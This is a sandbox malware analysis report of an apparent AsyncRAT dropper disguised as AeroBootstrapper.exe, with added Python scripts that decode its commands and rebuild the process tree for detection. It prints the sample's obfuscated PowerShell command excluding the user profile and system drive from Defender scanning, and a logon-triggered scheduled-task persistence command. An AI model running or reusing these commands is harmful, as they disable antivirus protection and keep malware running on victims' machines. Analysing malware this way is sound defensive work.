Malware Analysis Report

2024-09-22 07:02

Sample ID 240617-wzxb1atakq
Target AeroBootstrapper.exe
SHA256 b568a346e301f5d5f0732e6e6305e2a3f43b45c0957859aa49663ce9053af618
Tags: asyncrat, default, execution, rat
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 10/10

SHA256

b568a346e301f5d5f0732e6e6305e2a3f43b45c0957859aa49663ce9053af618

Threat Level: Known bad

The file AeroBootstrapper.exe was found to be: Known bad.

Malicious Activity Summary

Tags: asyncrat, default, execution, rat

AsyncRat / Async RAT payload: family match on the behavioral1 run (signatures below).

Executes dropped EXE: Runtime Broker.exe and SolaraBootstrapper.exe are written to %TEMP% and launched by AeroBootstrapper.exe.

Command and Scripting Interpreter: PowerShell: powershell.exe is started with an -EncodedCommand (base64 of UTF-16LE text) that runs Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force, excluding the whole user profile and the system drive from Microsoft Defender scanning.

Program crash: WerFault.exe is invoked for PID 1952 (SolaraBootstrapper.exe).

Unsigned PE: the submitted file carries no Authenticode signature.

Enumerates physical storage devices

Delays execution with timeout.exe: "timeout 3" is run from the dropped batch file tmp7AFC.tmp.bat.

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s): schtasks /create with an onlogon trigger at the highest run level; the task name and action are mangled because cmd.exe expanded the %AppData% placeholder in both.

Suspicious use of AdjustPrivilegeToken: SeDebugPrivilege is enabled by Runtime Broker.exe, powershell.exe and SolaraBootstrapper.exe.

Suspicious use of WriteProcessMemory: every recorded write is from a parent into a process it has just spawned; the rows reproduce the process tree rather than showing injection into an unrelated process.

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-06-17 18:22

Signatures

Unsigned PE


Analysis: behavioral1

Detonation Overview

Submitted

2024-06-17 18:22

Reported

2024-06-17 18:23

Platform

win11-20240508-en

Max time kernel

40s

Max time network

49s

Command Line

"C:\Users\Admin\AppData\Local\Temp\AeroBootstrapper.exe"

Signatures

AsyncRat

Tags: rat, asyncrat

Async RAT payload

Tags: rat

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Runtime Broker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A

Command and Scripting Interpreter: PowerShell

Tags: execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

Tags: persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

Tags: evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Runtime Broker.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1856 wrote to memory of 3904 N/A C:\Users\Admin\AppData\Local\Temp\AeroBootstrapper.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1856 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Local\Temp\AeroBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\Runtime Broker.exe
PID 1856 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\AeroBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
PID 4012 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\Runtime Broker.exe C:\Windows\SysWOW64\cmd.exe
PID 4012 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\Runtime Broker.exe C:\Windows\SysWOW64\cmd.exe
PID 1996 wrote to memory of 1716 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2860 wrote to memory of 3220 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe

Each row above is logged three times in the raw report (three writes per target); the duplicates are collapsed here. Every writer/target pair matches a parent and the child it spawned: AeroBootstrapper.exe (1856) starts powershell.exe (3904), Runtime Broker.exe (4012) and SolaraBootstrapper.exe (1952); Runtime Broker.exe starts two cmd.exe instances (2860, 1996), which start schtasks.exe (3220) and timeout.exe (1716). Process creation itself writes into the new child's address space, so these rows reproduce the process tree and do not show injection into a pre-existing process.
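The rows above are easier to read as a tree. The following Python is an added example, not part of the sandbox report: it parses one copy of each row (copied from the table above and embedded inline), deduplicates writer/target pairs, rebuilds the parent-to-children map, renders it indented by depth, and lists any target written by more than one PID, which is the pattern that would point to injection into an existing process instead of process creation. The row format it expects is the one this report uses; the check for multiple writers is the editor's own heuristic.

```python
"""Rebuild the process tree from the WriteProcessMemory rows in this report.
Added example (not part of the sandbox output). Creating a process also writes
into the child's address space, so the interesting question is whether any
target was written to by a PID other than its creator. ROWS is copied from the
report (one copy of each row; the report repeats every row three times)."""
import re
from collections import defaultdict

ROWS = r"""
PID 1856 wrote to memory of 3904 N/A C:\Users\Admin\AppData\Local\Temp\AeroBootstrapper.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1856 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Local\Temp\AeroBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\Runtime Broker.exe
PID 1856 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\AeroBootstrapper.exe C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
PID 4012 wrote to memory of 2860 N/A C:\Users\Admin\AppData\Local\Temp\Runtime Broker.exe C:\Windows\SysWOW64\cmd.exe
PID 4012 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\Runtime Broker.exe C:\Windows\SysWOW64\cmd.exe
PID 1996 wrote to memory of 1716 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2860 wrote to memory of 3220 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
"""

# Source image is matched lazily so that paths with spaces ("Runtime Broker.exe")
# split correctly at the " C:\" that begins the target image.
_ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) N/A (C:\\.+?) (C:\\.+)$")


def parse_rows(text):
    """Deduplicated (writer, target) edges plus a PID -> image-path map."""
    edges, images = set(), {}
    for line in text.splitlines():
        m = _ROW_RE.match(line.strip())
        if not m:
            continue
        src, dst, src_img, dst_img = m.groups()
        edges.add((int(src), int(dst)))
        images[int(src)], images[int(dst)] = src_img, dst_img
    return edges, images


def build_tree(edges):
    """Roots (PIDs never written to) and a parent -> children map, children sorted by PID."""
    children = defaultdict(list)
    for src, dst in sorted(edges):
        children[src].append(dst)
    roots = sorted({s for s, _ in edges} - {d for _, d in edges})
    return roots, children


def multi_writer_targets(edges):
    """Targets written by more than one PID (editor's heuristic for injection
    into an already-running process rather than into a freshly created child)."""
    writers = defaultdict(set)
    for src, dst in edges:
        writers[dst].add(src)
    return sorted(pid for pid, ws in writers.items() if len(ws) > 1)


def render_tree(roots, children, images):
    """One line per process, two spaces of indent per depth level."""
    lines = []

    def walk(pid, depth):
        name = images[pid].rsplit("\\", 1)[-1]
        lines.append("  " * depth + f"{name} (PID {pid})")
        for child in children.get(pid, []):
            walk(child, depth + 1)

    for root in roots:
        walk(root, 0)
    return lines


if __name__ == "__main__":
    edges, images = parse_rows(ROWS)
    roots, children = build_tree(edges)
    print("\n".join(render_tree(roots, children, images)))
    print("targets with more than one writer:", multi_writer_targets(edges))
```

For this report the tree has a single root, AeroBootstrapper.exe (PID 1856), and no target has more than one writer, which is what the note above the table says in prose.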

Processes

C:\Users\Admin\AppData\Local\Temp\AeroBootstrapper.exe

"C:\Users\Admin\AppData\Local\Temp\AeroBootstrapper.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHEAcgBkACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGkAdwBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHUAcQB0ACMAPgA="

Decoded (the blob is base64 of UTF-16LE text): <#qrd#>Add-MpPreference <#avl#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#iws#> -Force <#uqt#>

The <# ... #> block comments are inert filler that defeats naive string matching on the command line; the effective command is Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force, which excludes the entire user profile and the system drive from Microsoft Defender scanning. The command line names System32 but the recorded image is the SysWOW64 copy: the 32-bit parent is subject to WOW64 file-system redirection, which also accounts for the SysWOW64 paths of cmd.exe, schtasks.exe, timeout.exe and WerFault.exe below.

C:\Users\Admin\AppData\Local\Temp\Runtime Broker.exe

"C:\Users\Admin\AppData\Local\Temp\Runtime Broker.exe"

C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe

"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "%AppData%" /tr '"C:\Users\Admin\AppData\Roaming\%AppData%.exe"' & exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7AFC.tmp.bat""

C:\Windows\SysWOW64\timeout.exe

timeout 3

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "C:\Users\Admin\AppData\Roaming" /tr '"C:\Users\Admin\AppData\Roaming\C:\Users\Admin\AppData\Roaming.exe"'

The cmd.exe wrapper above passed /tn "%AppData%" and /tr '"C:\Users\Admin\AppData\Roaming\%AppData%.exe"', and cmd.exe expanded the variable in both places before schtasks.exe ran. The task name therefore became a literal directory path, and the action became C:\Users\Admin\AppData\Roaming\C:\Users\Admin\AppData\Roaming.exe, a path with a second drive root that cannot resolve to a file. The intended persistence is a logon-triggered task at the highest run level pointing at a copy of the payload under %AppData%; in this build the placeholder was never replaced with a file name, so the task as recorded could not start anything. The report does not show whether schtasks.exe succeeded in registering it.

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 1952 -ip 1952

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1952 -s 1488

Both WerFault.exe instances are Windows Error Reporting handling the crash of PID 1952, SolaraBootstrapper.exe (the "Program crash" signature); that process has no children in the WriteProcessMemory table.

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

SHCreateLocalServerRunDll with -Embedding is the standard shell32 entry point used when DCOM activates an out-of-process COM server. The report lists it alongside the crash handling and records no parent or further context for it.
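The two command lines in this section that an analyst checks by hand are the PowerShell -EncodedCommand and the schtasks persistence. The following Python is an added example, not part of the sandbox report: it decodes the blob (base64 of UTF-16LE), strips the <# ... #> junk comments so detection patterns see the real command, flags Defender exclusion tampering, and parses the schtasks /create switches to flag a logon trigger at the highest run level, an action under a user-writable directory, an unexpanded %VAR% placeholder and the double-drive-root path produced by the expansion. The inputs are copied from the Processes section (the cmd.exe wrapper as written and the schtasks.exe line as run); the regexes and the user-writable path list are the editor's own heuristics.

```python
"""Triage of the command lines recorded in this report. Added example, not
part of the sandbox output. The three inputs below are copied verbatim from
the Processes section; the detection patterns are the editor's heuristics."""
import base64
import re

POWERSHELL_CMDLINE = (
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand '
    '"PAAjAHEAcgBkACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAdgBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGkAdwBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHUAcQB0ACMAPgA="'
)
# The cmd.exe wrapper, before cmd.exe expanded %AppData% ...
SCHTASKS_AS_WRITTEN = (
    r'"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest '
    r'/tn "%AppData%" /tr ' + "'" + r'"C:\Users\Admin\AppData\Roaming\%AppData%.exe"' + "' & exit"
)
# ... and the command line schtasks.exe actually received.
SCHTASKS_AS_RUN = (
    r'schtasks /create /f /sc onlogon /rl highest /tn "C:\Users\Admin\AppData\Roaming" '
    r'/tr ' + "'" + r'"C:\Users\Admin\AppData\Roaming\C:\Users\Admin\AppData\Roaming.exe"' + "'"
)

# "-flag value", value optionally double-quoted; base64 alphabet only.
_FLAG_RE = re.compile(r'-([A-Za-z]+)\s+"?([A-Za-z0-9+/=]+)"?')
_DEFENDER_RE = re.compile(
    r"\b(?:Add|Set)-MpPreference\b.*?-(?:Exclusion(?:Path|Extension|Process)|Disable\w+)",
    re.I,
)
# "/switch value"; value may be "..." or '...'; a bare value must not start with '/'.
_SWITCH_RE = re.compile(r'''(/\w+)(?:\s+("[^"]*"|'[^']*'|(?!/)\S+))?''')


def decode_encoded_command(cmdline):
    """Script behind -EncodedCommand (PowerShell accepts any prefix, e.g. -e, -enc, or -ec)."""
    for flag, blob in _FLAG_RE.findall(cmdline):
        f = flag.lower()
        if f == "ec" or "encodedcommand".startswith(f):
            return base64.b64decode(blob).decode("utf-16-le")
    return None


def normalize_script(script):
    """Remove <# ... #> block comments and collapse whitespace."""
    return " ".join(re.sub(r"<#.*?#>", " ", script, flags=re.S).split())


def triage_powershell(cmdline):
    decoded = decode_encoded_command(cmdline)
    script = normalize_script(decoded if decoded is not None else cmdline)
    findings = []
    if decoded is not None:
        findings.append("encoded command")
        if "<#" in decoded:
            findings.append("junk block comments")
    hit = _DEFENDER_RE.search(script)
    if hit:
        findings.append("Defender tampering: " + hit.group(0))
    return script, findings


def parse_schtasks(cmdline):
    """Map each /switch (lower-cased) to its unquoted value; bare switches map to ''."""
    return {sw.lower(): val.strip("'\"") for sw, val in _SWITCH_RE.findall(cmdline)}


def triage_schtasks(cmdline):
    opts = parse_schtasks(cmdline)
    name, action = opts.get("/tn", ""), opts.get("/tr", "")
    findings = []
    if opts.get("/sc", "").lower() in ("onlogon", "onstart"):
        findings.append("boot/logon trigger: " + opts["/sc"])
    if opts.get("/rl", "").lower() == "highest":
        findings.append("runs at highest privilege level")
    if re.search(r"\\(AppData|Temp|ProgramData)\\", action, re.I):
        findings.append("action in user-writable directory")
    if re.search(r"%\w+%", name + action):
        findings.append("unexpanded %VAR% placeholder")
    if re.match(r"[A-Za-z]:\\", name):
        findings.append("task name is a filesystem path")
    if re.search(r"[A-Za-z]:\\.*[A-Za-z]:\\", action):
        findings.append("malformed action path (two drive roots)")
    return opts, findings


if __name__ == "__main__":
    script, findings = triage_powershell(POWERSHELL_CMDLINE)
    print(script, findings, sep="\n")
    for line in (SCHTASKS_AS_WRITTEN, SCHTASKS_AS_RUN):
        print(triage_schtasks(line)[1])
```

Run against the report's own lines, the PowerShell check yields the normalized Add-MpPreference -ExclusionPath command with the filler removed, and the two schtasks lines show the placeholder before expansion and the unusable two-drive-root action after it.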

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.nodejs.org udp

The only recorded network event is a DNS lookup of www.nodejs.org sent to Google Public DNS (8.8.8.8) over UDP/53. No connection to a command-and-control endpoint appears within the 49 s network window, so this report does not reveal the C2 address.

Files

C:\Users\Admin\AppData\Local\Temp\Runtime Broker.exe

MD5 3ef6a6f8a984c661f58c373081986213
SHA1 13f18179a85ae650bcfa70b47d027b0b3fe84d6e
SHA256 0b657c945d9ebee7f0b8a48be6f1abf4b9dbf2c0c609fc8030818a2229dd175e
SHA512 e7c6bc2b7e4d5d252b4b05628cab64007e5c0cec15657ee533ec78c7cd4546afb27df7b5b6be82b5d8bda085b93463dadaae41b74ccd6061b0ee7b2f68de27df

C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe

MD5 36b62ba7d1b5e149a2c297f11e0417ee
SHA1 ce1b828476274375e632542c4842a6b002955603
SHA256 8353c5ace62fda6aba330fb3396e4aab11d7e0476f815666bd96a978724b9e0c
SHA512 fddec44631e7a800abf232648bbf417969cd5cc650f32c17b0cdc12a0a2afeb9a5dbf5c1f899bd2fa496bd22307bfc8d1237c94920fceafd84f47e13a6b98b94

memory/4012-21-0x000000007319E000-0x000000007319F000-memory.dmp

memory/3904-23-0x00000000029C0000-0x00000000029F6000-memory.dmp

memory/4012-24-0x00000000008C0000-0x00000000008D8000-memory.dmp

memory/1952-25-0x0000000000C60000-0x0000000000D2E000-memory.dmp

memory/3904-26-0x0000000005100000-0x000000000572A000-memory.dmp

memory/3904-27-0x0000000073190000-0x0000000073941000-memory.dmp

memory/4012-28-0x00000000057F0000-0x0000000005D96000-memory.dmp

memory/3904-30-0x0000000073190000-0x0000000073941000-memory.dmp

memory/1952-31-0x0000000073190000-0x0000000073941000-memory.dmp

memory/3904-32-0x0000000004F80000-0x0000000004FA2000-memory.dmp

memory/3904-39-0x0000000005910000-0x0000000005976000-memory.dmp

memory/3904-43-0x0000000073190000-0x0000000073941000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wywwqmkn.qjc.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

powershell.exe writes a __PSScriptPolicyTest_<random>.ps1 file to %TEMP% at startup to probe AppLocker/WDAC script enforcement; this file is a side effect of launching PowerShell, not a file dropped by the sample.

memory/3904-33-0x0000000005730000-0x0000000005796000-memory.dmp

memory/3904-44-0x0000000005A00000-0x0000000005D57000-memory.dmp

memory/4012-45-0x0000000073190000-0x0000000073941000-memory.dmp

memory/3904-47-0x0000000005E80000-0x0000000005ECC000-memory.dmp

memory/3904-46-0x0000000005E20000-0x0000000005E3E000-memory.dmp

memory/3904-49-0x0000000073A90000-0x0000000073ADC000-memory.dmp

memory/3904-58-0x0000000006E00000-0x0000000006E1E000-memory.dmp

memory/3904-48-0x0000000006DC0000-0x0000000006DF4000-memory.dmp

memory/3904-59-0x0000000006E30000-0x0000000006ED4000-memory.dmp

memory/3904-61-0x00000000071A0000-0x00000000071BA000-memory.dmp

memory/3904-60-0x00000000077D0000-0x0000000007E4A000-memory.dmp

memory/3904-62-0x0000000007210000-0x000000000721A000-memory.dmp

memory/3904-63-0x0000000007410000-0x00000000074A6000-memory.dmp

memory/3904-64-0x0000000007390000-0x00000000073A1000-memory.dmp

memory/4012-69-0x0000000073190000-0x0000000073941000-memory.dmp

memory/3904-70-0x00000000073D0000-0x00000000073DE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp7AFC.tmp.bat

MD5 6918bb9ed24e0c2a7ce63564b89e678f
SHA1 4c95d6c6b3287e6796652313dc4cc2465cf780e2
SHA256 38926805b9ce9dcf107b342a2a0e72a1d01a2c95f1793b553ea0c7a50a2facaf
SHA512 ae630e7e36de75a59e6e47d0b31fe55f9bc85f2ac1f37c0025270966ae85bcdd2347d4cc1216dfc63477a09608506f3290005abff7fd198e8e1f638f89a229c6

Batch file run by the cmd.exe instance that spawned timeout.exe (PID 1996); "timeout 3" is its only recorded child. The report does not capture the batch file's contents.

memory/3904-72-0x00000000073E0000-0x00000000073F5000-memory.dmp

memory/3904-73-0x00000000074D0000-0x00000000074EA000-memory.dmp

memory/3904-74-0x00000000074C0000-0x00000000074C8000-memory.dmp

memory/3904-77-0x0000000073190000-0x0000000073941000-memory.dmp

memory/1952-78-0x0000000073190000-0x0000000073941000-memory.dmp